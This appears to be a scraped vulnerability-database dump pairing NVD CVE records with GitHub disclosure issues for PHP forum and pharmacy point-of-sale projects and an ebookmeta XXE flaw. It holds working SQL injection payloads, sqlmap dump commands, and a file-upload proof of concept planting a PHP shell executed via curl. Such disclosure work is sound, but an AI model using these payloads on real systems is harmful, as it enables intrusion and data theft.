{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kingshao0312/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.267407" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.267407" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.351115" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kingshao0312/cve/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.267407" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.267407" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.351115" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:online_discussion_forum_project:online_discussion_forum:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "753A7DC0-ED1C-4F55-B204-582C4E09467C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/kingshao0312/cve/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kingshao0312", "cve" ]
# Itsourcecode Online Discussion Forum Project in PHP with Source Code register_me.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Discussion Forum Project in PHP with Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-discussion-forum-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + wsy0312 ## Vulnerable File + register_me.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2015/11/bcc_forum.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'register_me.php' file of the 'Online Discussion Forum Project in PHP with Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "eaddress" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="790" alt="1" src="https://github.com/kingshao0312/cve/assets/49190143/1a4a8e40-8c2f-4de6-b6e5-bd78f38a1f09"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "eaddress" parameter, a serious SQL injection vulnerability was discovered in the registration function of "Online Discussion Forum Project in PHP with Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login verification required # Vulnerability details and POC POST /index.php HTTP/1.1 Host: 192.168.144.199:1218 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------25987118931599180511274139744 Content-Length: 1577 Origin: http://192.168.144.199:1218 Connection: close Referer: http://192.168.144.199:1218/index.php Upgrade-Insecure-Requests: 1 Priority: u=1 -----------------------------25987118931599180511274139744 Content-Disposition: form-data; name="fname" 123 -----------------------------25987118931599180511274139744 Content-Disposition: form-data; name="mname" 123 -----------------------------25987118931599180511274139744 Content-Disposition: form-data; name="lname" 123 -----------------------------25987118931599180511274139744 Content-Disposition: form-data; name="gender" Female -----------------------------25987118931599180511274139744 Content-Disposition: form-data; name="bdate" 1327-02-03 -----------------------------25987118931599180511274139744 Content-Disposition: form-data; name="yearlvl" Student -----------------------------25987118931599180511274139744 Content-Disposition: form-data; name="cnum" 123123 -----------------------------25987118931599180511274139744 Content-Disposition: form-data; name="eaddress" 1213123123@q2.com -----------------------------25987118931599180511274139744 Content-Disposition: form-data; name="address" 1231231 -----------------------------25987118931599180511274139744 Content-Disposition: form-data; name="idnum" 213123 -----------------------------25987118931599180511274139744 Content-Disposition: form-data; name="pass" 123123 -----------------------------25987118931599180511274139744 Content-Disposition: form-data; name="repass" 12312 -----------------------------25987118931599180511274139744 Content-Disposition: form-data; name="post" -----------------------------25987118931599180511274139744-- ## Vulnerability type: + time-based blind ## Vulnerability location: + 'eaddress' parameter ## Payload: <img width="480" alt="2" src="https://github.com/kingshao0312/cve/assets/49190143/4c1e5f5e-40b2-4ece-9df3-4cbfdebff5b1"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="375" alt="3" src="https://github.com/kingshao0312/cve/assets/49190143/d67c38b3-2246-4f07-b8b8-cfbd3210017c"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode Online Discussion Forum Project in PHP with Source Code register_me.php SQL injection
https://api.github.com/repos/kingshao0312/cve/issues/1/comments
0
2024-06-06T08:54:07Z
2024-06-06T09:02:09Z
https://github.com/kingshao0312/cve/issues/1
2,337,719,740
1
6,053
CVE-2024-5734
2024-06-07T12:15:09.463
A vulnerability classified as critical has been found in itsourcecode Online Discussion Forum 1.0. Affected is an unknown function of the file /members/poster.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-267408.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kingshao0312/cve/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.267408" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.267408" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.351116" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kingshao0312/cve/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.267408" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.267408" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.351116" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:online_discussion_forum_project:online_discussion_forum:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "753A7DC0-ED1C-4F55-B204-582C4E09467C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/kingshao0312/cve/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kingshao0312", "cve" ]
# Itsourcecode Online Discussion Forum Project in PHP with Source Code poster.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + Online Discussion Forum Project in PHP with Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-discussion-forum-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + wsy0312 ## Vulnerable File + poster.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2015/11/bcc_forum.zip # PROBLEM TYPE ## Vulnerability Type + Unrestricted Upload ## Root Cause + In line 120 of the poster.php file,The input obtained through $- FILES is directly used to determine the storage location of the file, without conducting a complete security check. The specific code snippet is as follows: <img width="535" alt="1" src="https://github.com/kingshao0312/cve/assets/49190143/6544969f-09b9-47e0-a031-f8a6ddda842a"> ## Impact + Attackers can exploit this vulnerability to upload malicious files without restriction, which can lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Exploiting malicious files can lead to remote attacks on RCE # DESCRIPTION + The file upload operation was triggered on line 120 of the "poster.php" file, and the uploaded file was received using the "$- FILES" variable. Due to the lack of appropriate input validation and cleaning, remote attackers only need to use regular user login to pass malicious payloads through this file upload function, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE). # Vulnerability details and POC ``` POST /members/poster.php HTTP/1.1 Host: 192.168.210.199:1218 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------312483722333599994122832151109 Content-Length: 738 Origin: http://192.168.210.199:1218 Connection: close Referer: http://192.168.210.199:1218/members/poster.php Cookie: PHPSESSID=jabnviksnmjivmindbg92d7ul7; pma_lang=zh_CN; phpMyAdmin=m2247ck38kcbu0l9o5o48levid; pmaUser-1=%7B%22iv%22%3A%22ePm47Dh1hV%2BLdrHjg1kf5A%3D%3D%22%2C%22mac%22%3A%224cf1786e2c0e5b1ed7096ad77edcd0515eb0dd08%22%2C%22payload%22%3A%22Ju8o%5C%2FvalEkTbwOwmuTw1YQ%3D%3D%22%7D; pmaAuth-1=%7B%22iv%22%3A%22kSgfNnjb%2BzFgG699ILlQxw%3D%3D%22%2C%22mac%22%3A%22112eaaeee2f0164cfb863d7506b554be2c20b402%22%2C%22payload%22%3A%220wL6EUMweGHpCy5FvlOb50zCjzOLhOSNwcpT%5C%2FmHMQwk%3D%22%7D Upgrade-Insecure-Requests: 1 Priority: u=1 -----------------------------312483722333599994122832151109 Content-Disposition: form-data; name="topic" WINDOWS -----------------------------312483722333599994122832151109 Content-Disposition: form-data; name="post_title" 1231231 -----------------------------312483722333599994122832151109 Content-Disposition: form-data; name="post_content" 1231231 -----------------------------312483722333599994122832151109 Content-Disposition: form-data; name="image"; filename="abc.php" Content-Type: application/octet-stream <?php system("ipconfig"); ?> -----------------------------312483722333599994122832151109 Content-Disposition: form-data; name="post" -----------------------------312483722333599994122832151109-- ``` <img width="915" alt="2" src="https://github.com/kingshao0312/cve/assets/49190143/bc645594-feec-48db-a88f-3271a627b1b5"> ## I successfully executed the PHP script on the terminal ```bash curl http://192.168.210.199:1218/post_images/abc.php ``` <img width="318" alt="3" src="https://github.com/kingshao0312/cve/assets/49190143/eaaeb6a0-422b-4a95-8d89-d973eadd6ecf">
Itsourcecode Online Discussion Forum Project in PHP with Source Code poster.php Unrestricted Upload
https://api.github.com/repos/kingshao0312/cve/issues/2/comments
0
2024-06-06T08:57:58Z
2024-06-06T08:57:58Z
https://github.com/kingshao0312/cve/issues/2
2,337,730,685
2
6,054
CVE-2024-36673
2024-06-07T13:15:49.547
Sourcecodester Pharmacy/Medical Store Point of Sale System 1.0 is vulnerable SQL Injection via login.php. This vulnerability stems from inadequate validation of user inputs for the email and password parameters, allowing attackers to inject malicious SQL queries.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/39" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/39" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pharmacy\\/medical_store_point_of_sale_system_project:pharmacy\\/medical_store_point_of_sale_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F27B3402-54AA-4DAF-BEF4-E6E6EB9EFEC1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CveSecLook/cve/issues/39
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CveSecLook", "cve" ]
# SourceCodester Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code 1.0 login.php SQL injection vulnerability # NAME OF AFFECTED PRODUCT(S) + Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code ## Vendor Homepage + https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + Huang Yue ## Vulnerable File + login.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/fkgeo/medical-store-source.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'login.php' file of the 'Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code' project. This issue arises because user inputs $user and $pass from $_POST['email'] and $_POST['password'] are directly used in SQL queries without proper sanitization or validation. This allows attackers to craft input values that can manipulate the SQL query and execute unauthorized operations. + ![1](https://github.com/CveSecLook/cve/assets/148504790/7caeaa65-b47a-45f3-9278-7d4eeeb42178) ## Vulnerability code snippets ```php <?php if (isset($_POST['login'])) { $user = $_POST['email']; $pass = $_POST['password']; $con = new mysqli('localhost','root','','medical'); $result = $con->query("SELECT * FROM users WHERE email='$user' AND password='$pass'"); if($result->num_rows>0) { session_start(); $data = $result->fetch_assoc(); $_SESSION['userId']=$data['id']; $_SESSION['bill'] = array(); header('location:index.php'); } else { echo "<script> \$(document).ready(function(){\$('#error').slideDown().html('Login Error! Try again.').delay(3000).fadeOut();}); </script> } } ``` + In the aforementioned code, the user inputs $user and $pass are directly embedded into the SQL query statement without any form of processing. This allows attackers to manipulate the query statement by including malicious SQL code in their inputs, thereby executing unauthorized database operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the "Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code," Huang Yue discovered a critical SQL injection vulnerability in the `login.php` file. This vulnerability stems from inadequate validation of user inputs for the email and password parameters, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation is required to secure the system and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + OR boolean-based blind - WHERE or HAVING clause + MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR) + MySQL >= 5.0.12 AND time-based blind (query SLEEP) ## Vulnerability location: + 'email' parameter ## Payload: ```sql email=-4156' OR 1214=1214-- DSCn&password=123&login= email=111@qq.com' OR ROW(5293,9929)>(SELECT COUNT(*),CONCAT(0x717a7a7a71,(SELECT (ELT(5293=5293,1))),0x71706b6a71,FLOOR(RAND(0)*2))x FROM (SELECT 8662 UNION SELECT 9796 UNION SELECT 9505 UNION SELECT 3269)a GROUP BY x)-- ahqP&password=123&login= email=111@qq.com' AND (SELECT 8848 FROM (SELECT(SLEEP(5)))zeUx)-- fOou&password=123&login= ``` ```makefile Parameter: email (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: email=-4156' OR 1214=1214-- DSCn&password=123&login= Type: error-based Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR) Payload: email=111@qq.com' OR ROW(5293,9929)>(SELECT COUNT(*),CONCAT(0x717a7a7a71,(SELECT (ELT(5293=5293,1))),0x71706b6a71,FLOOR(RAND(0)*2))x FROM (SELECT 8662 UNION SELECT 9796 UNION SELECT 9505 UNION SELECT 3269)a GROUP BY x)-- ahqP&password=123&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=111@qq.com' AND (SELECT 8848 FROM (SELECT(SLEEP(5)))zeUx)-- fOou&password=123&login= ``` + ![2](https://github.com/CveSecLook/cve/assets/148504790/4b1395c8-2cea-4b0e-9c9f-dd0b73371671) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash python sqlmap.py -u "http://192.168.31.216:8116/login.php" --data="email=111@qq.com&password=123&login=" --batch --dbms=mysql --level=5 --risk=3 --dump ``` + ![2](https://github.com/CveSecLook/cve/assets/148504790/28cff88b-18e9-4308-a1b1-6e1d6493e2bb) + ![3](https://github.com/CveSecLook/cve/assets/148504790/aff40f17-e482-4a6c-9f3a-f12c5031e0ba) + ![4](https://github.com/CveSecLook/cve/assets/148504790/547eef9d-b247-4b8a-bebb-0d2b8850d4a0) + ![5](https://github.com/CveSecLook/cve/assets/148504790/1b20bea8-1762-402e-9c5f-613290516a92) + ![6](https://github.com/CveSecLook/cve/assets/148504790/1b607fb4-973c-4d56-8cb1-e096d1cd6583) + ![7](https://github.com/CveSecLook/cve/assets/148504790/572ead2f-db3c-47c4-aa30-b2bf46031462) + ![8](https://github.com/CveSecLook/cve/assets/148504790/48044b53-8a65-4587-b5f2-16f6fffd7520) # Suggested repair + To prevent SQL injection vulnerabilities, it is recommended to use preprocessed statements and parameter binding when processing user input. The modified code is as follows: ```php if (isset($_POST['login'])) { $user = $_POST['email']; $pass = $_POST['password']; $con = new mysqli('localhost', 'root', '', 'medical'); // 使用预处理语句 $stmt = $con->prepare("SELECT * FROM users WHERE email=? AND password=?"); $stmt->bind_param("ss", $user, $pass); $stmt->execute(); $result = $stmt->get_result(); if ($result->num_rows > 0) { session_start(); $data = $result->fetch_assoc(); $_SESSION['userId'] = $data['id']; $_SESSION['bill'] = array(); header('Location: index.php'); } else { echo "<script> \$(document).ready(function(){ \$('#error').slideDown().html('Login Error! Try again.').delay(3000).fadeOut(); }); </script>"; } $stmt->close(); $con->close(); } ```
SourceCodester Pharmacy/Medical Store Point of Sale System Using PHP/MySQL and Bootstrap Framework with Source Code 1.0 login.php SQL injection vulnerability
https://api.github.com/repos/CveSecLook/cve/issues/39/comments
0
2024-05-21T09:26:36Z
2024-05-21T09:26:36Z
https://github.com/CveSecLook/cve/issues/39
2,307,818,147
39
6,055
CVE-2024-36827
2024-06-07T19:15:24.017
An XML External Entity (XXE) vulnerability in the ebookmeta.get_metadata function of ebookmeta before v1.2.8 allows attackers to access sensitive information or cause a Denial of Service (DoS) via crafted XML input.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dnkorpushov/ebookmeta/issues/16#issue-2317712335" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dnkorpushov/ebookmeta/issues/16#issue-2317712335" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dnkorpushov:ebookmeta:*:*:*:*:*:*:*:*", "matchCriteriaId": "6BA99F79-C8DC-4E7C-9572-13FAF67C04DB", "versionEndExcluding": "1.2.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/dnkorpushov/ebookmeta/issues/16#issue-2317712335
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dnkorpushov", "ebookmeta" ]
I found that when the ebookmeta version is less than 1.2.8 and the lxml version is less than 4.9.1, the ebookmeta.get_metadata function will have an xxe vulnerability. An attacker could use this vulnerability to read sensitive information from the server.
xxe vulnerability in ebookmeta.get_metadata()
https://api.github.com/repos/dnkorpushov/ebookmeta/issues/16/comments
0
2024-05-26T13:24:04Z
2024-07-09T14:48:05Z
https://github.com/dnkorpushov/ebookmeta/issues/16
2,317,712,335
16
6,056
CVE-2024-5773
2024-06-09T03:15:55.633
